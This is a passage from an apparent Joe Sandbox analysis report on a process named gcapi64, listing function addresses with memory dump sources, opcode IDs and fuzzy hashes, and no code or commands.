                                                                  Function 00007FFD9BA15A83 Relevance: .1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c227e2b133ae97b4ed349a309d4143f03f502560878b31d184cf75eae460961e
                                                                  • Instruction ID: bfb1b254dd0d22e8ab05d80b81abc886f88e0860b3458438c44eb71f578b3ad2
                                                                  • Opcode Fuzzy Hash: c227e2b133ae97b4ed349a309d4143f03f502560878b31d184cf75eae460961e
                                                                  • Instruction Fuzzy Hash: 9A01243274CA8C4FDB68DB6CE4A18A877E1DF8623431500ABE149C71A3DE66EC428784
                                                                  Function 00007FFD9BA08A88 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eaa230594e56965b2711454138cf002870f75aa2fb42bc4282a8e6b4b4ec7128
                                                                  • Instruction ID: 73b7f24f8d1efca486736836986003f310d4ab1686e4f2f936bbffe2d5f735e0
                                                                  • Opcode Fuzzy Hash: eaa230594e56965b2711454138cf002870f75aa2fb42bc4282a8e6b4b4ec7128
                                                                  • Instruction Fuzzy Hash: BA01FC02B1FD4E0BE7B052AD58A41745682DB97161B4901BBD18CC71A3E885ED418281
                                                                  Function 00007FFD9B795140 Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d448f1b3d305af6e6595281228008e1bc3a3eae2faa4d58b4927eddd947958e
                                                                  • Instruction ID: 3b1fd7079a4bf3893ee26472d2de89b9070e6bf099e78ca7e226a175473d0359
                                                                  • Opcode Fuzzy Hash: 1d448f1b3d305af6e6595281228008e1bc3a3eae2faa4d58b4927eddd947958e
                                                                  • Instruction Fuzzy Hash: 97111C71E0961D8EDFA4DF98D4516ED77B1EF58350F114276D00DE2161CA346A868B90
                                                                  Function 00007FFD9BA0ABD9 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b2af0d77cabbb39f5bf49d5d96bca92de4a218afeb7e58bde35fae960d01a7b5
                                                                  • Instruction ID: dbbe19a286d543ca23ae2d79ea49503f9effb6da7c9e374644336e16c97d1fe9
                                                                  • Opcode Fuzzy Hash: b2af0d77cabbb39f5bf49d5d96bca92de4a218afeb7e58bde35fae960d01a7b5
                                                                  • Instruction Fuzzy Hash: DE012620B2DF890FC799A77C50A58F2B7A1DF9921070502FBD05EC719BDD28990A8340
                                                                  Function 00007FFD9BA01651 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6b7ed3ca2fcc453b0db4ec5a5352740c12985e895b70db4cc6ad29fe3889ad3
                                                                  • Instruction ID: f4dd4043f497a22e4bac32bd2fd86c8246252aa370d467c853e5f3c6fd16c7f6
                                                                  • Opcode Fuzzy Hash: e6b7ed3ca2fcc453b0db4ec5a5352740c12985e895b70db4cc6ad29fe3889ad3
                                                                  • Instruction Fuzzy Hash: 5D012820A0E7491FE762972888656E97FD1DF96210F0D06BEE08CC60B2CDA84BC58382
                                                                  Function 00007FFD9B6C33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c4d2f4a008994e09edd86431d45d034055ebe52f51d2966f5626827daf1843b0
                                                                  • Instruction ID: 93b2781e6c9916f1f653d39cc5ccf8fcd30f80b0e9f39114202d79c4447c4a9d
                                                                  • Opcode Fuzzy Hash: c4d2f4a008994e09edd86431d45d034055ebe52f51d2966f5626827daf1843b0
                                                                  • Instruction Fuzzy Hash: 7301A73020CB0C4FD748EF0CE051AB6B3E0FB85364F10056EE58AC36A1DA32E882CB41
                                                                  Function 00007FFD9BA08A90 Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 90598040565c9d3254558cf8f18b44fd284f47adfbda06bb19ec4109dc8c1412
                                                                  • Instruction ID: f1971d1b0cd96ee660584e2c99183295711f88400ddcf6c0d6a6231176a442be
                                                                  • Opcode Fuzzy Hash: 90598040565c9d3254558cf8f18b44fd284f47adfbda06bb19ec4109dc8c1412
                                                                  • Instruction Fuzzy Hash: F7F0B411B29E0E0AD7A8B36D50A99F6A1D2DBA8210B54467A941FC31DEDC68E8454340
                                                                  Function 00007FFD9BA1FC29 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c8ef23cef529de7e39743b5da2ddebee82eab9ba33ac005f59b77939ec980496
                                                                  • Instruction ID: 8f66f5bb98bc0901901886e500673fcc88d209bafb69c32600e3cbd1b6de21c6
                                                                  • Opcode Fuzzy Hash: c8ef23cef529de7e39743b5da2ddebee82eab9ba33ac005f59b77939ec980496
                                                                  • Instruction Fuzzy Hash: A7F0C27190E78E8FDB65AF6488542F93FF0FF06300F5605BAE848C61A2DB38A554C701
                                                                  Function 00007FFD9B6CD220 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df402efcb483eaa30e8581d442e182b5a1a92c4fd2945559c2b784d172f164f2
                                                                  • Instruction ID: eebde0ea883c222462f162b136de656fc54322944009c9a5de4ec0d3ae38aa16
                                                                  • Opcode Fuzzy Hash: df402efcb483eaa30e8581d442e182b5a1a92c4fd2945559c2b784d172f164f2
                                                                  • Instruction Fuzzy Hash: FFF01272B0D54D4BEBD5ED5884706742692EB98704B1A006DD5AD972D2D965FC03C704
                                                                  Function 00007FFD9B6CFEB5 Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ec18726a23ea231d293c44e540ebcd40b989b352c6f4d765b90212572645b070
                                                                  • Instruction ID: 2296ccc3d343985836e21a30a08593ececdacaab4fb51b8e17ad0a05fcebd31a
                                                                  • Opcode Fuzzy Hash: ec18726a23ea231d293c44e540ebcd40b989b352c6f4d765b90212572645b070
                                                                  • Instruction Fuzzy Hash: A5F0D470609A4E8FDBA4EF58D955AAA37A0FF59300F010626E41EC31A4D734EA61CB81
                                                                  Function 00007FFD9B6CC6A6 Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e6e13f90867664c1479625dbe672eb1e82cbdb29f9b1a4fd785407a1c3e6a4f
                                                                  • Instruction ID: 814833f98e58abc4d20b975e4f10b4514b85e9bda349a58bdea685837daba2a4
                                                                  • Opcode Fuzzy Hash: 7e6e13f90867664c1479625dbe672eb1e82cbdb29f9b1a4fd785407a1c3e6a4f
                                                                  • Instruction Fuzzy Hash: 68F0A73260C5094FDB5DEE58D8B097473A2EB99314B16016DD55EC73E6CA25B902C744
                                                                  Function 00007FFD9B6CC8B6 Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 66b8d3284ddf7b03f139eb1bc16de1706343bc16b83c7f160419e8aa76ce37a9
                                                                  • Instruction ID: 1af28608f98033ed3b577095fcb81293ef9c7fc89b3cd80c7c7acb2dd75637a2
                                                                  • Opcode Fuzzy Hash: 66b8d3284ddf7b03f139eb1bc16de1706343bc16b83c7f160419e8aa76ce37a9
                                                                  • Instruction Fuzzy Hash: 5DF0E221B09A094BDB48BEAC846157533E2FF98300F210239A42F832D6DE34F91283C5
                                                                  Function 00007FFD9BA0E6BC Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 03aadbdb7a620ee95dec2810aefd899025a40af4b484631282bb0e00936e3451
                                                                  • Instruction ID: c7ed4cc9bb5af41d71bee5a53d2f7979f8582811b0f03dab08e214b8fed031bd
                                                                  • Opcode Fuzzy Hash: 03aadbdb7a620ee95dec2810aefd899025a40af4b484631282bb0e00936e3451
                                                                  • Instruction Fuzzy Hash: 77E04F72B4D60A0FF6281A4878570B463C1EB86270F40403FD58A856A3F85724530686
                                                                  Function 00007FFD9B6CC99D Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5da0cbdc178750734c8f20554fa12e1da35214f02f8da1405c690aa452f74d91
                                                                  • Instruction ID: b221dc3e68db09fa54f13264102a457399705e3afc2bcc6f7bd24dcf3c97ace4
                                                                  • Opcode Fuzzy Hash: 5da0cbdc178750734c8f20554fa12e1da35214f02f8da1405c690aa452f74d91
                                                                  • Instruction Fuzzy Hash: E6F02712A4E1450BF63979949C714343A649F92314F1B01FEC25A4B2E7D90C77068184
                                                                  Function 00007FFD9BA16CC0 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 067c99d077f2231d54eede6940582e88abbe7e5f710234e2cb9d41f96147d59f
                                                                  • Instruction ID: e3997110dd595e7d594beac6db7a5f058e8fdeb3a4f81850f6df5ae2d34e52b7
                                                                  • Opcode Fuzzy Hash: 067c99d077f2231d54eede6940582e88abbe7e5f710234e2cb9d41f96147d59f
                                                                  • Instruction Fuzzy Hash: 91E02630B19B090EEBB413FE681C372B6D0EB9C329F01463AD009C2290E9BC98818740
                                                                  Function 00007FFD9B6CC96E Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff921267371944425d44b7556063923d05ac65b1fa425b12a6184bf8196aa09e
                                                                  • Instruction ID: 2e2b4180b963ed0c58124e521d2384169ccf84c3fa22c26b8cdc5eecc16e7d5c
                                                                  • Opcode Fuzzy Hash: ff921267371944425d44b7556063923d05ac65b1fa425b12a6184bf8196aa09e
                                                                  • Instruction Fuzzy Hash: 1CF0E53170D2058BF229BA60D8746743770EF42324F2701BEC61A8F2E3CA3DB6068688
                                                                  Function 00007FFD9B6C591A Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30624453daaf64a37b5e165eb54ad595d65ca4e0dbc2bc9172cb8fc5827eb05f
                                                                  • Instruction ID: 7a511268d0ea8526958931d3c6006702a289764499a417faaa07c80ab531519f
                                                                  • Opcode Fuzzy Hash: 30624453daaf64a37b5e165eb54ad595d65ca4e0dbc2bc9172cb8fc5827eb05f
                                                                  • Instruction Fuzzy Hash: 04E0C23744E2CD4FD722BBB08C964E47FB0FF47210B1901EAD6A9CB063D95A665B8341
                                                                  Function 00007FFD9B7900A7 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b557157bf3f1f28d8a9a27374100c193489c1c85c8f5268fed380eb91db564a7
                                                                  • Instruction ID: 04cc38cbb8cd51d2e1d0160e774cfa9fbc1c313540e1791f40fc8c26a92a1a86
                                                                  • Opcode Fuzzy Hash: b557157bf3f1f28d8a9a27374100c193489c1c85c8f5268fed380eb91db564a7
                                                                  • Instruction Fuzzy Hash: 6AE0860174BAC90AD745A63C14641503B82AA91161FC544FAC449CF1A7D804484B4305
                                                                  Function 00007FFD9B6C91FE Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a59589eaf3fec4167a80b9550000e8183ca641ae50dfe3cefafd3a61f8b4d689
                                                                  • Instruction ID: 63306342825a25a5d8b0a4cbf0fa6d6ab2fe975b820e5269453c631e4767fe35
                                                                  • Opcode Fuzzy Hash: a59589eaf3fec4167a80b9550000e8183ca641ae50dfe3cefafd3a61f8b4d689
                                                                  • Instruction Fuzzy Hash: FFE08631F181450BE7626A3804695F9B7A2AF51300F2905F7C466C71A6DD6C99424381
                                                                  Function 00007FFD9B6C54F4 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 50f124d2ba6c097d735487bdeb5bd09dac33b80ce64759a67d2a1a5f8b10d903
                                                                  • Instruction ID: 2eca62656e4ab21082e8bb87d432950c54aa0d7a1d8391edda2c798daab0dd36
                                                                  • Opcode Fuzzy Hash: 50f124d2ba6c097d735487bdeb5bd09dac33b80ce64759a67d2a1a5f8b10d903
                                                                  • Instruction Fuzzy Hash: FDE01271E0851E8BDBA4EFA8886A6ADB7B0FB58300F1002699019E3281DF2869028B40
                                                                  Function 00007FFD9BA0405A Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9cf4c3fa9223081faf2679630384a86fc89f51db3e1e2e15e5cceb7aae57938d
                                                                  • Instruction ID: b98e3b89501b1ef7f7a840e7761547b092d2336c7256623d9869c818e48442b7
                                                                  • Opcode Fuzzy Hash: 9cf4c3fa9223081faf2679630384a86fc89f51db3e1e2e15e5cceb7aae57938d
                                                                  • Instruction Fuzzy Hash: 44D0A734454A4C5FCB40FF94D401499B360FB48304F400655EC2CC3251D735AAA1C741
                                                                  Function 00007FFD9B6C4EA6 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 585a3ca25f21f91d508ded3ea3229c4c4f5b99dc7ab9486779cd0f0fd62d6919
                                                                  • Instruction ID: 9040e8dd4cf1491b2639bd5258edc8418ce9f04b27885d31637bf5ecf9802b51
                                                                  • Opcode Fuzzy Hash: 585a3ca25f21f91d508ded3ea3229c4c4f5b99dc7ab9486779cd0f0fd62d6919
                                                                  • Instruction Fuzzy Hash: 23E01211B0B70F46F774F5E580A137951919F08301F12043EEA7E8A2E7DD18BA404341
                                                                  Function 00007FFD9B6C8B7D Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c7720548bf8af69c8abccf587588641aa629d31f799d43af3c1580c52457acad
                                                                  • Instruction ID: e82df8cad64515170296059fd199d62714fae695e01a26c0ab6560d1b8664519
                                                                  • Opcode Fuzzy Hash: c7720548bf8af69c8abccf587588641aa629d31f799d43af3c1580c52457acad
                                                                  • Instruction Fuzzy Hash: 57D05E3090650A8FD3A0AF24C0443757372FB49321F2001F9C11C9B2A5CE39A941CB40
                                                                  Function 00007FFD9B6C84D9 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 202e66f4abbdca2b0abf0fd07b3b91ce20ba92f79a55a9d423137c9f6eba6525
                                                                  • Instruction ID: 8d424e8adaab665c19286d8613974ee6aec31f871084ecf97f3e69a103f7990f
                                                                  • Opcode Fuzzy Hash: 202e66f4abbdca2b0abf0fd07b3b91ce20ba92f79a55a9d423137c9f6eba6525
                                                                  • Instruction Fuzzy Hash: 87D05B22E0E5494ED7B1FAE844283B457E05F46311F1B44F6C11DCF1E1D92C75419211
                                                                  Function 00007FFD9BA00899 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 60eae0fd9f09e1aadf3fe7458c2cf3ae5ba7704fedccd3660b52f7405dfbd9fb
                                                                  • Instruction ID: 8f9835512a9bbdbb568d838ae808972ad1a801700bbcbaefe0dc123a5ed8104c
                                                                  • Opcode Fuzzy Hash: 60eae0fd9f09e1aadf3fe7458c2cf3ae5ba7704fedccd3660b52f7405dfbd9fb
                                                                  • Instruction Fuzzy Hash: 4AC0026254E3C08FC3134B6048611843F705D1312075B01D7C080CB5B3D21C495AC722
                                                                  Function 00007FFD9B6C4CD0 Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c7b61765d462afa57aedbbcb66de0bfe37f78515e7f48500de3c70f18aa924b5
                                                                  • Instruction ID: 4e7ca5bdbdedf4dbe584ac4d99e3a43d596a79639a3034ff894e1538947599de
                                                                  • Opcode Fuzzy Hash: c7b61765d462afa57aedbbcb66de0bfe37f78515e7f48500de3c70f18aa924b5
                                                                  • Instruction Fuzzy Hash: C0A00205D9784E01D81871FA2D970A475605B8A154FC61764E91884196E89E66E90297
                                                                  Function 00007FFD9B6CC824 Relevance: .0, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67e3bcc3154736770f5c2976870ac8503b70e9b0ad85a7b45ab74a1697172601
                                                                  • Instruction ID: 7f6abc136f69f9fe9bad5ae1ea57c68dfe09fc428f9b8b9c7f542590e5c662e4
                                                                  • Opcode Fuzzy Hash: 67e3bcc3154736770f5c2976870ac8503b70e9b0ad85a7b45ab74a1697172601
                                                                  • Instruction Fuzzy Hash: FAB01230A0D04E4BE234FD54E4717BC21A06F04300F121479ED7E861E3CC1C39115685
                                                                  Function 00007FFD9B6C896E Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5560dd02ec3789d7496163fa0f0aa4e85bf816683e487b34b8b3fb534ef607d7
                                                                  • Instruction ID: 06c108745e664b2cda00b508b21d4e3084af3a14a083e2c140220d14d1692c8b
                                                                  • Opcode Fuzzy Hash: 5560dd02ec3789d7496163fa0f0aa4e85bf816683e487b34b8b3fb534ef607d7
                                                                  • Instruction Fuzzy Hash: B4A01221D0480C89D7B0DD04880037810A02744301F150072400DD7140C23815401600
                                                                  Function 00007FFD9B6CACF5 Relevance: .0, Instructions: 3COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 215151ad2eadf004dfd86a0790fadced54b998af657c8f656de0e404c1221c90
                                                                  • Instruction ID: a92bb79f2471fba47833186fc1e29f2596a58270911d55a7c012e262fa12d93e
                                                                  • Opcode Fuzzy Hash: 215151ad2eadf004dfd86a0790fadced54b998af657c8f656de0e404c1221c90
                                                                  • Instruction Fuzzy Hash: EFA022B0E0800C8BE330AACAC0003BC20A00B00300F228032802EC22A0C83C22802F00

                                                                  Non-executed Functions

                                                                  Function 00007FFD9BA03560 Relevance: .7, Instructions: 707COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 242a1310c9fd419389791b2d1fbc362614b80608b81799b6b255fe033dd3ce39
                                                                  • Instruction ID: a80ca2a0972674020b78b10c6e139b0f0e17c948396754039700833e9839888d
                                                                  • Opcode Fuzzy Hash: 242a1310c9fd419389791b2d1fbc362614b80608b81799b6b255fe033dd3ce39
